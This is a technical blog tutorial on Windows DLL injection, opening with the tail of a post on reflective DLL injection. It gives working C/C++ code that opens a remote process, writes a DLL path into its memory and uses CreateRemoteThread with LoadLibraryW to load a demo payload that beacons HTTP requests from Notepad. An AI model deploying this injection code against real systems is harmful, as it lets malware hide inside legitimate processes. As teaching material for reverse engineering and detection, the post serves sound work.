        typedef BOOL(WINAPI* DLLMAIN)(HINSTANCE, DWORD, LPVOID);
        ((DLLMAIN)pDllEntryPoint) ((HINSTANCE)pMappedCurrentDLL, DLL_PROCESS_ATTACH, NULL);

Invoke Entrypoint

Reflective DLL Injection Demonstration

The following GIF provides a video demonstration of the injection process. We can see the injector running and injecting into a Notepad process (PID 8020). Once this occurs there is thread activity inthe Notepad process. Shortly after HTTP activity beings in Wireshark indicating a successful injection.

Injection Demonstration

Digging deeper into the Notepad process inside of Process Hacker we can see a memory section that is readable, writable, and executable containing our injected DLL Payload.

Injected DLL Payload in Memory

We can also see The Winhttp.dll loaded into Notepad. Of course, this is not loaded by Notepad itself but by our DLL Payload that requires it for its functionality.

WINHTTP.DLL loaded after the IAT was resolved

Implementing DLL Injection

Aleks — Wed, 24 May 2023 16:56:26 GMT

Introducion

This post will introduce and cover the core concepts related to DLL Injection, including use cases, implementation, and identifying the technique during reverse engineering.

DLL Injection is a method of injection code into another process. As the name implies the core method involves injecting a DLL into the process and executing the contents of the DLL. This technique has multiple legitimate and illegitimate use cases.

The Windows operating system itself has support for DLL Injection and actively depends on the technique for the functionality of certain components. Primarily the native presence of DLL Injection can be found in the Win32 API function SetWindowsHookExA. However, this post will discuss another method of invoking DLL Injection.

Source Code for Examples

The source code associated with this post can be found on the following link.

Introduction to DLL Injection

There are two components in the DLL Injection lifecycle:

DLL Payload: The core payload that will be injected into another process.
DLL Injection Loader: The program responsible for performing the core injection logic and injecting the DLL Payload into another process.

DLL Injection involves the following steps:

Open a process handle to a remote process.
Allocate a region of memory in the remote process and copy the full path of the DLL Payload located on disk (For example, C:\file.dll).
Use CreateRemoteThread to execute LoadLibraryA in the target process while also passing the region of memory from step #2 to LoadLibraryA.

The goal of this entire process is to run the LoadLibraryA function inside of a remote process and pass in the path of our DLL Payload.

Creating DLL Injection Payload

For example purposes, a DLL file that makes HTTP requests to Google will be used as a payload that will be injected into a foreign process. HTTP requests were chosen as it is simple to visually see the feedback in a tool such as Wireshark or any other network monitoring mechanism. This will provide the necessary feedback required to understand if this logic has been successfully injected into another process.

A core of the DLL payload is a function named sendHTTPRequest that will make use of the Windows Internet (WinINet) API functions to call out to Google.

int sendHTTPRequest() {

        LPCSTR userAgent = "agent";
        LPCSTR connectDomain = "google.com";
        LPCSTR httpRequestType = "GET";
        LPCSTR targetPath = "/test";

        HINTERNET internetHandle = InternetOpenA(userAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
        if (internetHandle == NULL) {
                return -1;
        }

        DWORD_PTR dwService = (DWORD_PTR)NULL;

        HINTERNET httpHandle = InternetConnectA(internetHandle, connectDomain, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, dwService);
        if (httpHandle == NULL) {
                return -1;
        }

        HINTERNET httpRequestHandle = HttpOpenRequestA(httpHandle, httpRequestType, targetPath, NULL, NULL, NULL, 0, dwService);
        if (httpRequestHandle == NULL) {
                return -1;
        }

        BOOL result = HttpSendRequestA(httpRequestHandle, NULL, 0, NULL, 0);
        InternetCloseHandle(internetHandle);

        return 1;
}

HTTP Request Function that acts as our "Payload'

There is a wrapper function named loopHTTPConnect responsible for calling sendHTTPRequest every two seconds.

void loopHTTPConnect() {

        while (true) {
                Sleep(2000);
                sendHTTPRequest();
        }
}

Function that loops through the "Payload" function

The loopHTTPConnect function will be invoked in a thread spawned in DLLMain whenever the DLL is loaded in a function.

Implementing DLL Injection

1️⃣

Open Handle to Remote Process

The first step is to open a handle to the target process we would like to inject code into.

In this case OpenProcess is used to open a specific target process though the PID. The process handle is opened with three access right permissions:

PROCESS_VM_OPERATION: Provides the ability to manipulate the address space of the target process, such as allocating and freeing memory.
PROCESS_VM_WRITE: Provides the ability to write to the target process address space.
PROCESS_CREATE_THREAD: Provides the ability to create new threads within the running target process.

All three of these access rights will allow for the core steps related to the injection process to succeed.

HANDLE hTargetProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, injectionTargetProcessID);
	if (hTargetProcess == NULL) {
		std::string errorMessage = GetLastErrorAsString();
		std::cout << "Failed to aquire handle to process: " << errorMessage << "\n";
		return -1;
	}

Opening a Process for DLL Injection

2️⃣

Allocate Buffer in Remote Process for DLL Path

The next step involves allocating a buffer in the target process with VirtualAllocEx. This buffer will be used to store a string containing the path of the DLL payload on the filesystem that we would like to inject into the process.

Note that this buffer space is given the memory protection of PAGE_READWRITE. This memory space will only ever be written to by the injection loader and read by the target process itself, as a result it is sufficient to allow Read and Write permissions on this memory space.

LPVOID remoteBuffer = VirtualAllocEx(hTargetProcess, NULL, sizeof(dllPayloadPath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (remoteBuffer == NULL) {
        std::string errorMessage = GetLastErrorAsString();
        std::cout << "Failed to aquire handle to process: " << errorMessage << "\n";
        return -1;
}

Allocating a Buffer in Target Process to Hold DLL Path used for injection

3️⃣

Write Path of DLL Payload to Allocated Memory

After a memory buffer has been allocated in the target process the path to the DLL payload must now be written to it. The path to the DLL payload is defined as:

wchar_t dllPayloadPath[] = L"C:\\DLLPayload.dll";

Path of DLL Payload to Inject Written as a Wide String

WriteProcessMemory will be used to write this string to the newly allocated memory buffer in the target process.

if (!WriteProcessMemory(hTargetProcess, remoteBuffer, (LPVOID)dllPayloadPath, dllPayloadPathSize, NULL)) {
        std::string errorMessage = GetLastErrorAsString();
        std::cout << "Failed to aquire handle to process: " << errorMessage << "\n";

        VirtualFreeEx(hTargetProcess, remoteBuffer, 0, MEM_RELEASE);
        CloseHandle(hTargetProcess);

        return -1;
}

Writing DLL Path String to Allocoated Memory Space in Target Process

At this stage we have a buffer in the target process with a path to a DLL on the filesystem.

4️⃣

Load DLL Payload

The last stage will create a thread in the target process with CreateRemoteThread and execute the LoadLibraryW function, a function with the capability of loading DLLs into a process. The LoadLibraryW function will also take in the buffer allocated in the target process containing the full path of the DLL payload we would like to load.

The entire purpose of allocating the memory in the previous step was to have the DLL path within it so it can be passed as a parameter to LoadLibraryW. It is important to remember that the LoadLibraryW function is running inside of the target process and can only access the memory of the target process, this is why we needed to allocate the buffer in the target process.

LPTHREAD_START_ROUTINE pLoadLibraryAddress = (LPTHREAD_START_ROUTINE) LoadLibraryW;
HANDLE hThread = CreateRemoteThread(hTargetProcess, NULL, 0, pLoadLibraryAddress, remoteBuffer, 0, NULL);
if (hThread == NULL) {
        std::string errorMessage = GetLastErrorAsString();
        std::cout << "Failed to aquire handle to process: " << errorMessage << "\n";
}
else {
        printf("Injection Complete\n");
}

Run LoadLibraryW in the Target Process as a Thread to Load the DLL Payload

One key point to also understand is that ASLR does not apply to a set few DLLs that the Windows operating system has specify, one of which is Kerenl32.dll (the same DLL that contains LoadLibraryW. The address is only randomized at boot after which every process on the system shares the same addresses.

This point can be demonstrated with the following screenshot where kernel32.dll in Chrome and Edge have the same base address.

Kernel32.dll is loaded at the same address space in all processes

What this means is that the location of LoadLibraryW in the DLL Injector and the target process are the same. This is why can define the following variable and pass it directly to the CreateRemoteThread function.

LPTHREAD_START_ROUTINE pLoadLibraryAddress = (LPTHREAD_START_ROUTINE) LoadLibraryW;

HANDLE hThread = CreateRemoteThread(hTargetProcess, NULL, 0, pLoadLibraryAddress, remoteBuffer, 0, NULL);
if (hThread == NULL) {
	std::string errorMessage = GetLastErrorAsString();
	std::cout << "Failed to aquire handle to process: " << errorMessage << "\n";
}
else {
	printf("Injection Complete\n");
}

Defining LoadLibraryW as the Thread to Execute in the Target Process

DLL Injection Demonstration

The following GIF provides a video demonstration of the injection process. When the DLL Injector is executed we can see HTTP traffic begin in the Wireshark window. At the same time, we can see in Process Monitor the process responsible for this traffic is Notepad.

This is an indication of successful injection as Notepad by itself does not conduct any network activities.

Digging deeper, in Process Hacker we can see the buffer allocated to store the DLL payload path inside of Notepad.

Looking into the modules loaded by Notepad, we can also see the name of our pay (DLLPayload.dll).